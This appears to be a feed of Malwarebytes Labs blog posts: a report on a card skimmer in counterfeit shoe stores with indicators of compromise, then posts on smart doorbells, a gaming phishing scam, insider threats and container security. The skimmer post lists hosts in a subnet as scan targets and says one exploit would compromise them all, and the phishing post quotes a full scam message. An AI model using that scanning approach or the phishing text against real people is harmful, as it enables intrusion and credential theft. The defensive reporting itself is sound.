trainersnmd[.]com is hosted in Russia at 91.218.113[.]213. Looking at the 91.218.113.0/24 subnet, we can see many more domains used in the same counterfeit business.

Some of those domains were taken over and replaced with a serving notice. For example, in May 2019, Adidas filed a complaint for injunctive relief and damages against hundreds of fake Adidas stores.

Mass credit card skimmer injection

The skimming code was appended to a JavaScript file called translate.js. (A full copy of the deobfuscated skimmer can be found here.)

Stolen data, including billing addresses and credit card numbers, is exfiltrated to a server in China at 103.139.113[.]34.

What’s interesting is that this is actually a massive compromise across several IP subnets:

A cursory look at several domains using Sucuri’s SiteCheck revealed they are using the same outdated software:

It’s likely a malicious scanner simply crawled those IP ranges and used the same vulnerability to compromise each and every one of those counterfeit sites.
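
For a sense of scale: sweeping an entire /24 like the one above means probing at most 254 hosts, which Python’s standard library can enumerate in a couple of lines (enumeration only—this sends no traffic; the subnet is the one named in the article):

```python
import ipaddress

def hosts_in_subnet(cidr):
    """List the host addresses an automated scanner would probe when
    sweeping a CIDR range. .hosts() excludes the network and broadcast
    addresses for a /24."""
    return [str(ip) for ip in ipaddress.ip_network(cidr).hosts()]

targets = hosts_in_subnet("91.218.113.0/24")
```

Pair that with a single known exploit for the shared outdated software, and compromising every counterfeit site in the block becomes a matter of minutes.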

Online shopping and its risks

Shopping online these days is akin to walking into a minefield, yet many people aren’t aware of the dangers lurking behind every corner.

Based on our crawlers, we see new e-commerce sites fall victim to web skimmers every day. Looking at our telemetry, we can also correlate the number of web blocks to shopping patterns, such as Black Friday and Cyber Monday events.

We saw an increase in credit card skimming activity for Black Friday and Cyber Monday, but not as much as anticipated.

Many online stores were running deals for some time prior, even since late Oct. #Magecart #skimming #BlackFriday #CyberMonday pic.twitter.com/0DEMFXwjPa

— MB Threat Intel (@MBThreatIntel) December 3, 2019

As we saw in this post, counterfeit sites pose a double threat: shoppers not only end up with illicit goods, but may also be robbed of their data by a different group of criminals.

While we cannot completely eliminate the threat of digital skimmers, here are some tips on how to reduce the risks associated with online shopping:

  • Make sure that your computer is malware-free and running the latest patches. Leverage a security product that offers web protection. Malwarebytes’ flagship anti-malware product, as well as its newly introduced (and free) Browser Guard extension for Chrome and Firefox, can thwart Magecart-related skimmers by blocking malicious scripts and websites from loading or exfiltrating data.
  • If you are shopping on a site for the first time, check that it looks maintained. While this does not replace a thorough security scan, seeing notes such as “Copyright 2015” may indicate that the website is not really being looked after.
  • Minimize how often you enter your credit card data by relying on other payment methods instead. For example, large, reliable online retailers such as Amazon already have your payment details stored in your account. Other safe methods include Apple Pay or prepaid Visa or Mastercard cards.
  • Check your bank/credit card statements regularly to identify potentially fraudulent charges.
  • Help prevent further attacks by reporting any fraudulent activity (especially if you were a victim) to law enforcement authorities.
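
The “Copyright 2015” check in the tips above can even be automated. A minimal sketch—the regex and the two-year cutoff are our own choices, and a stale year alone proves nothing on its own:

```python
import re
from datetime import date

def stale_copyright(page_html, max_age_years=2):
    """Flag pages whose newest 'Copyright YYYY' notice is old, one of
    the neglect signals mentioned in the tips. Heuristic only."""
    years = [int(y) for y in
             re.findall(r"[Cc]opyright\D{0,5}(19\d\d|20\d\d)", page_html)]
    if not years:
        return False  # no notice found; inconclusive, not suspicious
    return date.today().year - max(years) > max_age_years
```
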
Indicators of Compromise (IOCs)

Counterfeit sites injected with skimmer

180workshoe[.]com
1freshfoot[.]com
2018nmd4u[.]com
234learnshoe[.]com
270takeshoe[.]com
365daysshoe[.]com
5923shoe[.]com
97saleweekly[.]com
987lateshoe[.]com
adsmithfwt[.]com
acheterftwr[.]com
addrubber[.]com
airmaxweekly[.]com
allsizeshoe[.]com
adnkclub[.]com
ashshoeslink[.]com
apparentshoe[.]com
auflaufschuh[.]com
utgumnshoes[.]com
awsnkrs[.]com
bajasprecio[.]com
basketouve[.]com
bestkixify[.]com
beastsole[.]com
best7now[.]com
bestshoesbf[.]com
blanchenmd[.]com
blazersoldes[.]com
boostrunner[.]com
boutiquesnks[.]com
brandingsit[.]com
breakerun[.]com
cageforlock[.]com
cestboncony[.]com
caretosole[.]com
champrun95[.]com
chaussureplace[.]com
cisalfaports[.]com
chamdot[.]com
chaussureprofile[.]com
colourmvp[.]com
compraestilos[.]com
closerpremium[.]com
closerselect[.]com
continuefeet[.]com
comfyftwr[.]com
cusmakeit[.]com
couleurmvp[.]com
courtadv[.]com
damesbedoor[.]com
ddtows[.]com
deeruptshoe[.]com
descubra19[.]com
docvab[.]com
donnescontate[.]com
dividesneakers[.]com
donectory[.]com
dryyourfoot[.]com
easeweekly[.]com
easyfootrun[.]com
energeticshoe[.]com
elementsthat[.]com
entryonlike[.]com
eternalapt[.]com
evidentshoe[.]com
febdate[.]com
farbasefull[.]com
farbenrun[.]com
farvefit[.]com
fleunderride[.]com
fewusedit[.]com
footbester[.]com
footrunclub[.]com
footsweek[.]com
footstijl[.]com
footstil[.]com
footstylish[.]com
foreasyon[.]com
for1sell[.]com
freernshoe[.]com
futureitblue[.]com
futureoiwill[.]com
futurenishoes[.]com
futureyouto[.]com
gelbneu[.]com
geschenkein[.]com
getgshoes[.]com
getbetternl[.]com
goldsoldes[.]com
grauwearim[.]com
grijsentop[.]com
goingtopurchase[.]com
grigiotopsu[.]com
greyheel[.]com
gsnkrs[.]com
guldafdk[.]com
headrebajas[.]com
hererunner[.]com

hjrshoe[.]com
inikirun[.]us
iweardam[.]com
jtsportsde[.]com
justshopclub[.]com
kaiisko[.]com
kaufenftwr[.]com
kaischuhe[.]com
kickfrstore[.]com
kickscrewstore[.]com
kickstienda[.]com
kickvapor[.]com
kickswinkel[.]com
kixifyshop[.]com
kixifyrun[.]com
kixifystore[.]com
kleurmvp[.]com
kleurschuhe[.]com
laufschuhebeste[.]com
linrubsole[.]com
lobeskoruns[.]com
lony19[.]com
lowesthalf[.]com
luckyisport[.]com
maxformob[.]com
manifestshoe[.]com
maximummost[.]com
metyshoes[.]com
mjftoods[.]com
mindedshoe[.]com
monitornon[.]com
msnkrs[.]com
nairschoenen[.]com
nairchaussure[.]com
nairscarpe[.]com
nairschuhe[.]com
nettstil[.]com
netwhilesale[.]com
newseftwr[.]com
newfeetreal[.]com
newmaxreal[.]com
newshoesreal[.]com
newstylereal[.]com
newwholereal[.]com
nicestijl[.]com
nicestil[.]com
nieuwekaufe[.]com
nicestilebay[.]com
nicestylebay[.]com
niceventefr[.]com
nmdforfemme[.]com
nmdrosare[.]com
nieuwekaufen[.]com
nmd5club[.]com
nmdnoir[.]com
nmdpksneaker4u[.]com
nmdoriginals[.]com
nmdreplace4u[.]com
nmdtrainers[.]com
noticeableshoes[.]com
noteystore[.]com
nuevorunning[.]com
nrdunkzpa[.]com
nrunnersale[.]com
nouveauhaven[.]com
nuevoshoe[.]com
nuovehaven[.]com
obviousshoe[.]com
offwschuhe[.]com
oplev19[.]com
oroshoesit[.]com
ordinarytrend[.]com
oroboostpas[.]com
outlet3prix[.]com
outletsfire[.]com
particleprovide[.]com
paschernoir[.]com
perpetuallook[.]com
pearlshoeslink[.]com
perpetualfree[.]com
phlshoe[.]com
pickonsneakers[.]com
pinkshoeslink[.]com
ponashoes[.]com
porsneakers[.]com
premiumnuevo[.]com
poshseeking[.]com
profilesshoe[.]com
prophereshoe[.]com
psbeautytre[.]com
racersho[.]com
runnerfr[.]com
ozemetoen[.]com
rosakopen[.]com
run4kick[.]com
rubberplat[.]com
runnerdry[.]com
runstormon[.]com

saledksko[.]com
saldifire[.]com
sarezalando[.]com
scarpekingdom[.]com
scarpe-new[.]com
scarpastate[.]com
schoenenbeste[.]com
schoenenprofile[.]com
schuherunlau[.]com
schuhesize[.]com
schuhneu[.]com
schuheplace[.]com
schuheprofile[.]com
scopri19[.]com
showam97[.]com
shoehallrun[.]com
sizehaven[.]com
showschuh[.]com
skorunvit[.]com
sjjshoe[.]com
skoprofile[.]com
skonmd[.]com
snadnket[.]com
sneakerbyside[.]com
sneakerebe[.]com
sneakerees[.]com
sneakermodelli[.]com
sneakerunow[.]com
snkrsstrike[.]com
snugfree[.]com
snstuff[.]us
sortheads[.]com
sort5sko[.]com
sportkopen[.]com
sportinghave[.]com
sportopwears[.]com
sports-be[.]com
sportsalebay[.]com
sportsneu[.]com
sportsonfr[.]com
sports-ha[.]com
stayonlinese[.]com
sprishoes[.]com
startingnice[.]com
streetcolouring[.]com
stripeschuhe[.]com
stuffnuevo[.]com
stuffkicks[.]com
stuffkopen[.]com
stuffoutfr[.]com
stuffpknit[.]com
styleftwr[.]com
stvprxsko[.]com
styleschoen[.]com
styleschuh[.]com
stylezapato[.]com
suitableshoe[.]com
swzoomsch[.]com
texmedever[.]com
tehshoes[.]com
takerightback[.]com
tedschuhe[.]com
thegodwillout[.]com
thxshoe[.]com
tiendaout[.]com
tosomtosideaway[.]com
trainernmdcbk[.]com
trainersnmd[.]com
tstripeseqt[.]com
uomoweekly[.]com
usesmoother[.]com
usualshares[.]com
valuablemax[.]com
vertchausfr[.]com
verstaleshoes[.]com
vtfreencs[.]com
vvvfabrices[.]com
walkingnice[.]com
wearingselect[.]com
willgoout[.]com
willrunalong[.]com
willrunout[.]com
willhiking[.]com
winatershoes[.]com
wmboost[.]com
withnormal[.]com
willtrval[.]com
witroze[.]com
wmsnkrs[.]com
wsnkrs[.]com
zapatosnmd[.]com
zwtnlzsen[.]com

Skimmer

103.139.113[.]34

The post Hundreds of counterfeit online shoe stores injected with credit card skimmer appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Please don’t buy this: smart doorbells

Malware Bytes Security - Mon, 12/09/2019 - 12:15pm

Though Black Friday and Cyber Monday are over, the two shopping holidays were just precursors to the larger Christmas season—a time of year when online packages pile high on doorsteps and front porches around the world.

According to some companies, it’s only logical to want to protect these packages from theft, and wouldn’t it just so happen that these same companies have the perfect device to do that—smart doorbells.

Equipped with cameras and constantly connected to the Internet, smart doorbells provide users with 24-hour video feeds of the view from their front doors, capturing everything that happens when a user is away at work or sleeping in bed.

Some devices, like the Eufy Video Doorbell, can allegedly differentiate between a person dropping off a package and, say, a very bold, very unchill goat marching up to the front door (it really happened). Others, like Google’s Nest Hello, proclaim to be able to “recognize packages and familiar faces.” Many more, including Arlo’s Video Doorbell and Netatmo’s Smart Video Doorbell, can deliver notifications to users whenever motion or sound are detected nearby.

The selling point for smart doorbells is simple: total vigilance in the palms of your hands. But if you look closer, it turns out a privatized neighborhood surveillance network is a bad idea.

To start, some of the more popular smart doorbell products have suffered severe cybersecurity vulnerabilities, while others lacked basic functionality upon launch. Worse, the data privacy practices at one major smart doorbell maker resulted in wanton employee access to users’ neighborhood videos. Finally, partnerships between hundreds of police departments and one smart doorbell maker have created a world in which police can make broad, multi-home requests for user videos without needing to show evidence of a crime.

The path to allegedly improved physical security shouldn’t involve faulty cybersecurity or invasions of privacy.

Here are some of the concerns that cybersecurity researchers, lawmakers, and online privacy advocates have found with smart doorbells.

Congress fires off several questions on privacy

On November 20, relying on public reports from earlier in the year, five US Senators sent a letter to Amazon CEO Jeff Bezos, demanding answers about a smart doorbell company that Bezos’ own online retail giant swallowed up for $839 million—Ring.

According to an investigation by The Intercept cited by the senators, beginning in 2016, Ring “provided its Ukraine-based research and development team virtually unfettered access to a folder on Amazon’s S3 cloud storage service that contained every video created by every Ring camera around the world.”

The Intercept’s source also said that “at the time the Ukrainian access was provided, the video files were left unencrypted, the source said, because of Ring leadership’s ‘sense that encryption would make the company less valuable,’ owing to the expense of implementing encryption and lost revenue opportunities due to restricted access.”

Not only that, but, according to the Intercept, Ring also “unnecessarily” provided company executives and engineers with access to “round-the-clock live feeds” of some customers’ cameras. For Ring employees who had this type of access, all they needed to actually view videos, The Intercept reported, was a customer’s email address.

The senators, in their letter, were incensed.

“Americans who make the choice to install Ring products in and outside their homes do so under the assumption that they are—as your website proclaims—‘making the neighborhood safer,’” the senators wrote. “As such, the American people have a right to know who else is looking at the data they provide to Ring, and if that data is secure from hackers.”

The lawmakers’ questions came hot on the heels of Senator Ed Markey’s own September effort to untangle Ring’s data privacy practices for children. How, for instance, does the company ensure that children’s likenesses won’t be recorded and stored indefinitely by Ring devices, the senator asked.

According to The Washington Post, when Amazon responded to Sen. Markey’s questions, the answers potentially came up short:

“When asked by Markey how the company ensured that its cameras would not record children, [Amazon Vice President of Public Policy Brian Huseman] wrote that no such oversight system existed: Its customers ‘own and control their video recordings,’ and ‘similar to any security camera, Ring has no way to know or verify that a child has come within range of a device.’”

But Sen. Markey’s original request did not just focus on data privacy protections for children. The Senator also wanted clear answers on an internal effort that Amazon had provided scant information on until this year—its partnerships with hundreds of police departments across the country.

Police partnerships

In August, The Washington Post reported that Ring had forged video-sharing relationships with more than 400 police forces in the US. Today, that number has grown to at least 677—an increase of roughly 50 percent in just four months.

The video-sharing partnerships are simple.

By partnering with Ring, local police forces gain the privilege of requesting up to 12 hours of video spanning a 45-day period from all Ring devices that are included within half a square mile of a suspected crime scene. Police officers request video directly from Ring owners, and do not need to show evidence of a crime or obtain a warrant before asking for this data.

Once the video is in their hands, police can, according to Ring, keep it for however long they wish and share it with whomever they choose. The requested videos can sometimes include video that takes place inside a customer’s home, not just outside their front door.

At first blush, this might appear like a one-sided relationship, with police officers gaining access to countless hours of local surveillance for little in return. But Ring has another incentive, far away from its much-trumpeted mission “to reduce crime in neighborhoods.” Ring’s motivations are financial.

According to Gizmodo, for police departments that partner up with Ring to gain access to customer video, Ring gains near-unprecedented control in how those police officers talk about the company’s products. The company, Gizmodo reported, “pre-writes almost all of the messages shared by police across social media, and attempts to legally obligate police to give the company final say on all statements about its products, even those shared with the press.”

Less than one week after Gizmodo’s report, Motherboard obtained documents that included standardized responses for police officers to use on social media when answering questions about Ring. The responses, written by Ring, at times directly promote the company’s products.

Further, in the California city of El Monte, police officers offered Ring smart doorbells as an incentive for individuals to share information about any crimes they may have witnessed.

The partnerships have inflamed multiple privacy rights advocates.

“Law enforcement is supposed to answer to elected officials and the public, not to public relations operatives from a profit-obsessed multinational corporation that has no ties to the community they claim they’re protecting,” said Evan Greer, deputy director of Fight for the Future, when talking to Vice.

Matthew Guariglia, policy analyst with Electronic Frontier Foundation, echoed Greer’s points:

“This arrangement makes salespeople out of what should be impartial and trusted protectors of our civic society.”

Cybersecurity concerns

When smart doorbells aren’t potentially invading privacy, they might also be lacking the necessary cybersecurity defenses to work as promised.

Last month, a group of cybersecurity researchers from Bitdefender announced that they’d discovered a vulnerability in Ring devices that could have let threat actors swipe a Ring user’s WiFi username and password.

The vulnerability, which Ring fixed after being privately notified about it in the summer, lay in the setup process between a Ring doorbell and the owner’s Wi-Fi network. To properly set up the device, the Ring app needs to send the user’s Wi-Fi credentials to the doorbell. But Bitdefender researchers found that this information was being sent over an unencrypted connection.

Unfortunately, this vulnerability was not the first of its kind. In 2016, a company that tests for security vulnerabilities found a flaw in Ring devices that could have allowed threat actors to steal WiFi passwords.

Further, this year, another smart doorbell maker suffered so many basic functionality issues that it stopped selling its own device just 17 days after its public launch. The smart doorbell, the August View, went back on sale six months later.

Please don’t buy

We understand the appeal of these devices. For many users, a smart doorbell is the key piece of technology that, they believe, can help prevent theft in their community, or equip their children with a safe way to check on suspicious home visitors. These devices are, for many, a way to calmer peace of mind.

But the cybersecurity flaws, invasions of privacy, and attempts to make public servants into sales representatives go too far. The very devices purchased for security and safety belie their purpose.

Therefore, this holiday season, we kindly suggest that you please stay away from smart doorbells. Deadbolts will never leak your private info.

The post Please don’t buy this: smart doorbells appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (December 2 – December 8)

Malware Bytes Security - Mon, 12/09/2019 - 11:47am

Last week on Malwarebytes Labs, we took a look at a new version of the IcedID Trojan, described web skimmers up to no good, and took a deep dive into containerization. We also explored a report bringing bad news for organizations and insider threats, and threw a spotlight on a video game phish attack.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (December 2 – December 8) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Fake Elder Scrolls Online developers go phishing on PlayStation

Malware Bytes Security - Fri, 12/06/2019 - 3:29pm

A player of popular gaming title Elder Scrolls Online recently took to Reddit to warn users of a phish via Playstation messaging. This particular phishing attempt is notable for ramping up the pressure on recipients—a classic social engineering technique taken to the extreme.

A terms of service violation?

In MMORPG land, the scammers take a theoretically plausible deadline, crunch it into something incredibly short and ludicrous, and go fishing for the catch of the day. Behold the pressure-laden missive from one fake video game developer to a player:

Click to enlarge

The text of the phishing message reads as follows:

We have noticed some unusual activity involving this account. To be sure you are the rightful owner, we require you to respond to this alert with the following account information so that you may be verified,

– Email address

– Password

_ Date of birth on the account

In response to a violation of these Terms of Service, ZeniMax may issue you a warning, suspend or restrict certain features of the account. We may also immediately terminate any and all accounts that you have established. Temporarily or permanently ban the account, device, and/or machine from accessing, receiving, playing or using all or certain services.

Under the current circumstances, you have 15 minutes from opening this alert to respond with the required information. Failure to do so will result in an immediate account ban, permanently losing access to our servers on all platforms, along with all characters  associated with the account in question. Please be sure to double check your information and spelling before sending.

Yes, you read that correctly—a grand total of 15 whole minutes to panic email scammers back with your login details. But what exactly happened to warrant such an immediate need for verification? The vagueness of the fake message may actually work in the scammer’s favour here because MMORPG titles are often rife with cheating/botting/scamming, so developers are typically light on information when genuine infractions occur.

FOMO: oh no

FOMO, fear of missing out, is the lingering fear that not only have they never had it so good, but the “they” in question almost certainly isn’t you.

Marketers and sales teams exploit this ruthlessly, with sudden sales and the promise of things you can’t do without. Hotel booking websites can’t help but tell you how many other people have the same deal open RIGHT NOW.

Video games, especially online titles and MMORPGs, take a similar approach, offering in-game purchases but rotating items slowly, leading to a form of digital scarcity that encourages transactions because gamers don’t know if the item will be seen again.

Inventory space, character slots, and many more crucial elements are at a premium, and people invest serious money to make the most out of their experience. With this in mind, people tend to be particular about keeping their account secure.

As a result, scammers are hugely effective at turning FOMO on its head, giving people a nasty dose of “fear of something about to happen or else.” Had a spot of bother with ransomware? No sweat, pay us in Bitcoin and you’ll get your documents back—as long as you do it within three days. Fake sextortion email claiming they’ve recorded you watching pornography? Yeah, that’ll be $1,000 in 48 hours or we’ll release the footage and tell all your friends and family.

“It wasn’t me, what did I do?”

You’ll often see people banned from titles complaining on forums that all access has been revoked, with no explanation besides a “You are banned, sorry” type message. Quite often they won’t even be able to follow up with support, because the ban also locks them out of raising a ticket.

Scammers know they can skip some of the fake explanation shovel work, as nobody ever receives a detailed explanation anyway. Developers stay vague to obscure the inner workings of their fraud detection systems: if they spilled the beans, malicious individuals would adjust their behaviour accordingly. That’s a tricky tightrope for developers to walk, but additional security measures can compensate. Does Elder Scrolls Online meet the challenge?

Sadly, the game doesn’t allow players to lock down accounts with a third-party authenticator. There’s no mobile app, and there are zero authentication sticks. What they do have is a few password suggestions and some information about their one-time password system.

It’s certainly good that the password system exists, and one would hope it would spring into life in this case, but players would probably appreciate a little more control over their security choices, as well as a few safety nets when things go wrong.

By comparison, the hugely popular Black Desert Online offers Google authenticator two-factor authentication (2FA). Blizzard has you covered with their own authenticator. Guild Wars offers both an authenticator app and SMS lockdowns.

Some simple rules to follow

Regardless of which game you play, remember:

  • Don’t reuse passwords
  • Make the password as strong as the system allows
  • Tie your account to a locked-down email address, ideally also secured with 2FA
  • Never, ever send login details in reply to an email or text message asking for them. First authenticate the message: hover over the sender address and any links to see whether they’re legitimate, search for known scams or phishes associated with the company in question, and read the instructions over carefully.
  • If you’re still in doubt whether an email is legitimate or not, err on the side of caution and go directly to your account’s website/login page. If there is a need to verify or change credentials, you can change them there.
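
The “hover over links” advice above boils down to checking a link’s real hostname against the official domain. A minimal sketch—the domain names are illustrative, and this catches the classic lookalike trick where the real domain is buried in a subdomain:

```python
from urllib.parse import urlparse

def link_matches_site(url, official_domain):
    """True only if the URL's hostname is the official domain or a
    subdomain of it. 'elderscrollsonline.com.evil.example' fails,
    because endswith() requires a dot *before* the official domain."""
    host = (urlparse(url).hostname or "").lower()
    official = official_domain.lower()
    return host == official or host.endswith("." + official)
```
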

Phishing is one of the oldest cyberattack methods on the book, yet it remains a favorite of scammers because, quite simply, it works. Don’t be fooled by FOMO, high-pressure deadlines, or too-good-to-be-true deals.

The post Fake Elder Scrolls Online developers go phishing on PlayStation appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Report: Organizations remain vulnerable to increasing insider threats

Malware Bytes Security - Thu, 12/05/2019 - 11:00am

The latest data breach at Capital One is a noteworthy incident not because it affected over 100 million customer records, 140,000 Social Security numbers (SSNs), and 80,000 linked bank accounts. Nor was it special because the hack was the result of a misconfigured web application firewall.

Many still talk about this breach because a leak of this magnitude, which we’ve historically seen conducted by nation-state actors, was made possible by a single skilled insider: Paige A. Thompson. Thompson set a benchmark for single insider threat attacks against the banking industry—and we can expect that benchmark to be cleared.

On a more chilling note, criminal enterprises have already opened a market for corporate employees willing to trade proprietary secrets for cash as a form of “side job.” A number of these underground organizations, unsurprisingly, hail from countries outside the United States, such as Russia and China. Unfortunately for US organizations, these criminal enterprises pay very well.

Recently, Cybersecurity Insiders—in partnership with Gurucul, a behavior, identity, fraud, and cloud security analytics company—released results of its research on insider threats, revealing the latest trends, organizational challenges, and methodologies on how IT professionals prepare for and deal with this danger. Here are some of their key findings:

  • More than half of organizations surveyed (58 percent) said that they are not effective at monitoring, detecting, and responding to insider threats.
  • 63 percent of organizations think that privileged IT users pose the biggest security risk. This is followed by regular employees (51 percent), contractors/service providers/temporary workers (50 percent), and other privileged users, such as executives (50 percent).
  • 68 percent of organizations feel that they are moderately to extremely vulnerable to insider threats.
  • 52 percent of organizations confirm that it is more difficult for them to detect and prevent insider threats than to detect and prevent external cyberattacks.
  • 68 percent of organizations have observed that insider threats have become more frequent in the past 12 months.

The report also states reasons why organizations are increasingly having difficulty detecting and preventing insider threats, which include the increased use of applications and/or tools that leak data, an increased amount of data that leaves the business environment/perimeter, and the misuse of credential or access privileges.

The possible reasons for difficulty in detecting and preventing insider threats (Courtesy of Cybersecurity Insiders)

The CERT Insider Threat Center, part of the CERT Division at Carnegie Mellon’s Software Engineering Institute (SEI) that specializes in insider threats, recently put forth a blog series that ran from October 2018 to August 2019 on the patterns and trends of insider threats. These posts contained breakdowns and analyses of what insider threats look like across certain industry sectors, statistics, and motivations behind insider incidents, which vary considerably from sector to sector.

Below are a few high-level takeaways from these posts:

  • The CERT Insider Threat Center has identified the top three crimes insiders commit across industries: fraud, intellectual property theft, and IT systems sabotage.
  • Fraud is the most common insider threat incident recorded in the federal government (60.8 percent), finance and insurance (87.8 percent), state and local governments (77 percent), healthcare (76 percent), and the entertainment (61.5 percent) industries.
  • All sectors consistently experienced insider incidents perpetrated by trusted business partners, typically ranging between 15 and 25 percent across all insider incident types and sectors. This should be an eye-opening statistic, especially for SMBs, as research suggests they partner with other businesses rather than hiring employees.
Scope of the insider threat problem (Courtesy of the Carnegie Mellon University Software Engineering Institute)

Insider threats in the spotlight—finally!

The National Counterintelligence and Security Center (NCSC) and the National Insider Threat Task Force (NITTF), together with the Federal Bureau of Investigation, the Office of the Under Secretary of Defense (Intelligence), the Department of Homeland Security, and the Defense Counterintelligence and Security Agency declared September National Insider Threat Awareness Month, which launched this year.

The goal of the annual campaign is to educate employees about insider threats and to maximize the reporting of abnormal employee behavior before things escalate to an insider incident.

“All organizations are vulnerable to insider threats from employees who may use their authorized access to facilities, personnel or information to harm their organizations—intentionally or unintentionally,” says NCSC Director William Evanina in a press release [PDF]. “The harm can range from negligence, such as failing to secure data or clicking on a spear-phishing link, to malicious activities like theft, sabotage, espionage, unauthorized disclosure of classified information or even violence.”

We have tackled insider threats at length on several occasions on the Malwarebytes Labs blog. Now is always the right time for organizations to give this cybersecurity threat some serious thought and to plan how they can combat it. After all, businesses that only worry about attacks from the outside will, at some point, be hit with attacks from the inside. The good news is that organizations don’t have to wait for next September; they can start dealing with this problem today.

The CERT Insider Threat Center offers a list of common-sense recommendations for mitigating insider threats that every cybersecurity, managerial, legal, and human resources professional should have on hand. The Center also showcases a trove of publications for organizations that would like to go deeper.

We’d also like to add our own blog on the various types of insiders your organization may encounter and certain steps you can take to nip insider risks in the bud. We also paid closer attention to workplace violence, a type of insider threat that is often forgotten.

Stay safe! And remember: When you see something, say something.

The post Report: Organizations remain vulnerable to increasing insider threats appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: What is containerization?

Malware Bytes Security - Wed, 12/04/2019 - 12:00pm

Containerization. Another one of those tech buzzwords folks love to say but often have no idea what it means. A better way to organize children’s toys? The act of bringing Tupperware out to dinner to safely transport home leftovers? Another name for Russian dolls?

Containerization is, of course, none of those things. But its definition might be best captured in a quick example rather than a description:

Eliza wrote a program on her Windows PC to streamline workflow between her department, a second department within the company, and a third outside agency. She carefully configured the software to eliminate unnecessary steps and enable low-friction sharing of documents, files, and other assets. When she proudly demoed her program on her manager’s desktop Mac, however, it crashed within seconds—despite working perfectly on her own machine.

Containerization was invented to tackle that problem.

What is containerization?

In traditional software development, programmers code an application in one computing environment that may run with bugs or errors when deployed in another, as was the case with Eliza above. To solve this, developers bundle their application together with all the related configuration files, libraries, and dependencies required to run, inside containers hosted in the cloud. This method is called containerization.

The goal of containerization is to allow applications to run in an efficient and bug-free way across different computing environments, whether that’s a desktop or virtual machine or Windows or Linux operating system. The demand for applications to run consistently among different systems and infrastructures has moved development of this technology along at a rapid pace. The use of different platforms within business organizations and the move to the cloud are undoubtedly huge contributors to this demand.

Containerization is almost always conducted in a cloud environment, which contributes to its scalability. While some of the most popular cloud services are known for data storage—Google Drive, iCloud, Box—other public cloud computing companies, such as Amazon Web Services, Oracle, or Microsoft Azure, allow for containerization. In addition, there are private cloud solutions, in which companies host data on an enterprise intranet or data center.

The difference between containerization and virtualization

Containerization is closely related to virtualization, and it often helps to compare and contrast the two in order to get a better understanding of how containerization can help organizations build and run applications.

Containers, unlike virtual machines (VMs), do not require the overhead of an entire operating system (OS). That means containerization is less demanding in the hardware department and needs fewer computing resources than what you’d need to run the same applications on virtual machines.

Organizations could even opt to share common libraries and other files among containers to further reduce the overhead. Sharing of these files happens at the application layer, whereas VMs run on the hardware layer. As a result, you can run more application containers that share a common OS.

Image courtesy of ElectronicDesign.

VMs are managed by a hypervisor (aka virtual machine monitor) and utilize VM hardware, while containerized systems either (1) provide operating system services from the underlying host and isolate the applications using virtual-memory hardware, or (2) have the container manager provide an abstract OS for the containers. Either approach eliminates a layer and, in doing so, saves resources and provides a quicker startup time, when necessary.

Why use containerization?

There are a few reasons why organizations decide to use containerization:

  • Portability: You can run the application on any platform and in any infrastructure. Switch to a different cloud supplier? No problem.
  • Isolation: Mishaps and faults in one container do not carry over to other containers. This means maintenance, development, and troubleshooting can be done without downtime of the other containers.
  • Security: The strict isolation from other applications and the host system also results in better security.
  • Management: You don’t have to think about the effects on other applications when you update, add further developments, or even rollback.
  • Scalability: Instances of containers can be copied and deployed in the cloud to match the growing needs of the organization.
  • And last but not least, cost effectiveness: Compared to virtualized solutions, containerization is much more efficient and it reduces costs for server instances, OS licenses, and hardware.
Security risks for containers

Since containerization started out as a means for efficient development and cost savings and quickly ballooned in adoption and implementation, security was unfortunately a low priority in its design—as it often is in tech innovation.

Yet containers have a large attack surface, as they tend to include complex applications whose components communicate with each other over the network. On top of the standard vulnerabilities introduced by various application components, misconfigurations create further security gaps, such as inadequate authorization. These vulnerabilities are not limited to the top layer of the application.

Add to these vulnerabilities the limitations of some security vendors, whose enterprise programs may not be able to protect containers running in the cloud environment. Due to the isolated nature of the containers, some security solutions may not be able to scan inside active containers or monitor their behavior as they would when running on a virtual machine.

Containers’ security postures are further weakened by users’ likely lack of awareness of these limitations, which might encourage less stringent oversight. Indeed, there are already prime examples of threat actors taking advantage of containerization developers’ security indifference.

On November 26, ZDNet reported that a hacking group was mass-scanning the Internet looking for Docker platforms with open API endpoints to deploy a classic XMRig cryptominer. What’s worse is that they also disabled security software running on those instances. Containerization users must take care not to leave admin ports and API endpoints exposed online, otherwise cybercriminals can easily wreak havoc. If they were able to install cryptominers, what’s to stop them from dropping ransomware?
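
Defenders can run a quick self-check for that kind of exposure on hosts they own. A minimal sketch, assuming the default unencrypted Docker API port (2375); the function name is our own:

```python
import socket

def docker_api_exposed(host: str, port: int = 2375, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to the (unencrypted) Docker API
    port succeeds -- a quick self-check for accidental exposure."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False

# Only check infrastructure you are authorized to test:
# docker_api_exposed("10.0.0.5")  -> True means the daemon port is reachable
```

A reachable port is not proof of compromise, but an unauthenticated Docker API listening on the open Internet is exactly what the attackers above were scanning for.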

Security recommendations

In order to shore up containers so that applications can run efficiently and bug-free in diverse environments while remaining secure, there are a few simple pieces of advice developers and operators should keep in mind.

Probably the most important: When copying the runtime system, developers, managers, or operators will need to check whether the latest patches and updates have been applied for all components. Otherwise, programmers could copy outdated, insecure, or even infected libraries to the next container. One common piece of advice is to store a model container in a secure place that can be updated, patched, and scanned before it is copied to work environments.

Second: When migrating a container to a different environment, the operator will have to take into account the possible vulnerabilities in both the container and new environment, as well as the influence of the container’s behavior on the new environment. Despite its portability, the container might require additional demands for safety measures or configuration of the container management system.

The rest of containerization’s security efforts can be summed up in a few short bullets:

  • Check for exposed endpoints and close the ports, if there are any.
  • Limit direct interaction between containers.
  • Use providers that can assist with security know-how, if it’s not available in house.
  • Use container isolation to your advantage, but also be aware of the consequences. Configure containers to be read-only.
  • If available, use your container orchestration platform to enhance and keep tabs on security.
  • Consider security solutions that can scan and protect containers in the cloud working environment if your current provider is unable.

These additional security measures might feel counterintuitive, as developers originally set out to build standard containers that behave the same way in every environment and for every user. But they are minor, simple steps that can go a long way toward protecting an organization’s data and applications.

Therefore, use containerization as it suits best, but always keep security in mind.

The post Explained: What is containerization? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

